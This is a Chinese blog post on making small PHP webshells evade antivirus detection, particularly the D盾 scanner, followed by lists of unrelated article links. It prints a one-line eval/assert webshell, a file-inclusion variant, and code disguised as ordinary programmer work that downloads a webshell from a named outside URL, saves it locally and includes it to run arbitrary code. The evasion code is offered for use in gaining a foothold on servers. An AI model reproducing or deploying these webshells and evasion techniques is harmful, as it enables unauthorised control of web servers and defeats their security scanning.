浅谈PHP小马免杀
在渗透测试过程初期,上传小马,拿到 webshell
再进行下一步的操作,现如今的网站安全更多是
一些云防护、CDN防护、服务器安全软件等等,给渗透测试、提权等带来了一定难度的提升,
今天探讨一下如何做PHP小马的免杀。
小马:体积、代码量比较小的webshell
文件,一般借助“中国菜刀”、蚁剑等 shell
链接工具,进行进一步的渗透测试
小马因为代码小,显得更加灵活。就像行军打仗的侦察兵、卧底,里应外合,最后攻下城池
今天的PHP
代码免杀,主要是针对D盾
下载了一个最新版的D盾:http://www.d99net.net/
0x01 常见的小马
<?php @eval($_POST['x']); ?>
上述代码可能是大家见过最普通的小马文件了,体积小
但是基本上过不了任何装有了 WAF
或者安全软件的检测
刚在本地编写一个,结果就被 win10
自带的 defender
给杀了,可见其有多弱~
到D盾检查一下:
爆了5级危险
由此可见,这种精简的小马,已经不再适合当下互联网环境
0x02 初步尝试
既然eval()
函数无法使用,我们尝试其他的可执行命令的函数呐?
更换assert()
函数
同样被检测为高危了,由此,这种更换其他函数的方式,实则换汤不换药,如此免杀小马,肯定是不可行的。
还有别的方法吗?
0x02 从开发者角度思考问题
为什么 PHP
或者其他编程语言当中,会出现这些“危险高权限”函数,因为开发者需要,如果都被安全软件拦截了,那么开发人员又该如何去实现自己的功能呐?
其实,我们免杀的过程就是要从开发者会犯的错误入手,这些看上去符合正常业务逻辑的程序,也可能隐藏着可突破杀软拦截的方法。
文件包含
从文件包含入手
<?php
$file = isset($_GET['file'])?trim($_GET['file']):'<?php @assert($_POST["x"]);?>';
require_once($file);
?>
再来看看,D盾的拦截提示:
3级危险提示,可疑的引用
因为是引用文件,所以提示了可疑
2.2 假装自己是个程序员
仔细一琢磨,哪家的程序员会这样写代码,连函数都没有!!!
幻想自己现在是一名正在加班熬夜写 BUG
的程序猿
那么,我们再写个函数
<?php
error_reporting(0);
/**
* DYBOY写的BUG,通过获取远程小马的代码
**/
function httpGET($target_url, $get_data = array()){
$result = file_get_contents($target_url);
file_put_contents('../xiaoma.txt', $result); //windows本地环境特殊,使用相对路径,linux可以使用“/”即网站根目录
return TRUE;
} $r_file = httpGET('http://www.top15.cn/content/uploadfile/201908/7b9c1566231060.txt');
require_once('../xiaoma.txt');
?>
继续优化
和安全似乎有点无关了,本人觉得上面的代码,每次都要去远程获取文件,这种行为是不够优雅的
因此增加一个判断文件是否已存在,增强变量名可读性
<?php
error_reporting(0);
/**
* DYBOY写的BUG,通过获取远程小马的代码
**/
$file_path_name = '../xiaoma.txt'; function httpGET($target_url, $get_data = array()){
$content = file_get_contents($target_url);
file_put_contents($file_path_name, $content); //windows本地环境特殊,使用相对路径,linux可以使用“/”即网站根目录
return TRUE;
} if(!file_exists($file_path_name)){
httpGET('http://www.top15.cn/content/uploadfile/201908/7b9c1566231060.txt');
} require_once($file_path_name);
?>
关于为什么不直接读取远程文件的问题,读取远程文件需要 php.ini
中设置 allow_url_include=On
;一般来讲,PHP
默认此属性关闭,也很少会有网站会开启此功能,因此将远程文件先下载到本地,再利用 LFI
(本地文件包含)方式执行任意代码!
总结
其实脚本的免杀非常灵活,任何的防护软件都得保证程序的基本功能,因此在权衡是正常程序还是异常程序这个点上,单纯的脚本防护能力还是比较弱的
在对攻击进行拦截的方法中,基于攻击大数据训练出来的攻击识别模型,或许才是下一代防火墙要做的事情,不少的 CDN
云防护产品正是基于此
在云防护的保障下,同样要坚信,安全无绝对,面对多维度的攻击,云防护也并不是无懈可击。
浅谈PHP小马免杀的更多相关文章
- 浅谈微信小程序对于房地产行业的影响
前几日,我们曾经整理过一篇文章是关于微信小程序对于在线旅游业的影响的一些反思(浅谈微信小程序对OTA在线旅游市场的影响),近日由于生活工作的需要走访了一些房地产的住宅商品房,突然想到微信小程序对于房地 ...
- 浅谈微信小程序对于创业者,意味着什么?
尽管这个话题,有点儿烂大街,然而作为开发者兼创业人,兹以为很有必要为自己梳理一番. 多年前,当萌生创业的念头时,我是这样在脑海里绘制这幅蓝图的: 我需要一个域名,一个服务器,并且备了案. 我需要至少一 ...
- 浅谈微信小程序
在如火如荼的互联网技术发展中,各种各样的框架出现,当下最受关注的应该就是微信小程序了.从新闻论坛乃至qq群.微信群,很多很多从事IT工作的朋友喜欢讨论研究这个小程序.带着好奇心,我也参与其中. 第一步 ...
- 浅谈字体小图标font awesome,iconfont,svg各自优缺点
三种都是矢量图(即放大不失真),但是个自又有个自的优缺点, 1.font awesome: 优点:相对比较简单,查看官网看例子基本上都会用 (http://www.bootcss.com/p/font ...
- 浅谈微信小程序一二
1.生命周期 1.onLoad():页面加载时触发,一个页面只加载一次. 2.onShow():页面显示切换的时候触发 3.onReady():页面初次渲染完成时触发.一个页面只会调用一次,代表页面已 ...
- 浅谈vue,小程序,react基础绑定值
最近一直在用react开发项目,碰见的问题千千万,很多,但是都殊途同源,唯一区别大的就是没有像vue的双向绑定,也没有小程序的单向方便,比如: vue v-modal="msg" ...
- [转]浅谈微信小程序
本文转自:http://www.cnblogs.com/liziyou/p/6340159.html 微信小程序 1.什么是小程序 小程序是指微信公众号平台小程序,小程序可以在微信内被便捷的获取和转播 ...
- 浅谈微信小程序生命周期
之前在做微信小程序的时候,一直对生命周期里面的onLoad,onShow,onUnload不是很理解.比如说什么时候会触发onUnload. 经过一段时间的测试发现,普通页面的onUnload在三种情 ...
- 浅谈Python小数据池
什么是小数据池 小数据池是python中提高效率的一种方式,固定数据类型的相同值使用同一内存地址. id 用于获取开辟空间的内存地址 代码块 一个文件,一个模块,一个函数,一个类,终端中的每一行代码都 ...
随机推荐
- .NET Core开发实战(第11课:文件配置提供程序)--学习笔记
11 | 文件配置提供程序:自由选择配置的格式 文件配置提供程序 Microsoft.Extensions.Configuration.Ini Microsoft.Extensions.Configu ...
- ES6的一些语法
let, const, class, extends, super, arrow functions, template string, destructuring, default, rest ar ...
- linux常用命令之------文件操作、文件查看、权限、打包压缩
1.一般公司把linux作为自己的应用服务器,将应用和服务器部署在上面 2.测试一般用来打包.压缩.查日志,写一个简单的shell 获得linux服务器的方式 a:网上租一台云服务器 b:安装vmwa ...
- Python说文解字_Python之多任务_03
问:线程学完了,现在我们开始学习进程了吧? 答:是的.前面说到线程就是我们的手,我们现在可以学习一下我们的“胳膊”了. 我们有了多线程,为什么还要学习多进程呢?这是因为在Python当中有一把GIL锁 ...
- 移动端 之 触摸事件、Tap事件和swipe事件
触摸事件 touch是一个事件组,意思不止一个事件,是移动端滑动事件组,touchstart touchmove touchend touchcancel touchstart 当刚刚触摸屏幕的时候触 ...
- 4)栈和队列-->受限线性表
栈和队列叫 受限线性表 只不过他们插入和删除的位置 相对于之前的线性表有了限制 所以叫受限线性表 1)栈-->就是先进后出 2)队列-->先进先出 3)循环链表框图: 4)队列
- VUE 引用公共样式
首先创建公共样式文件 在main.js中引用样式 浏览器效果图
- python刷LeetCode:1.两数之和
难度等级:简单 题目描述: 给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标. 你可以假设每种输入只会对应一个答案.但是,你不 ...
- 每天一杯C_Visual Studio各个版本的区别和总结
细致区别如上图所示 企业版点满图中技能树,能够提供点对点的解决方案,充分满足正规企业的要求. PS:技能最多,肯定也就价格最贵 专业版中提供的专业开发者工具.服务和订阅就成了最佳选择. PS:技能多, ...
- JS中,输出1-10之间的随机整数
<script> document.write(parseInt(10*Math.random())); //输出0-10之间的随机整数 document.write(Math.floor ...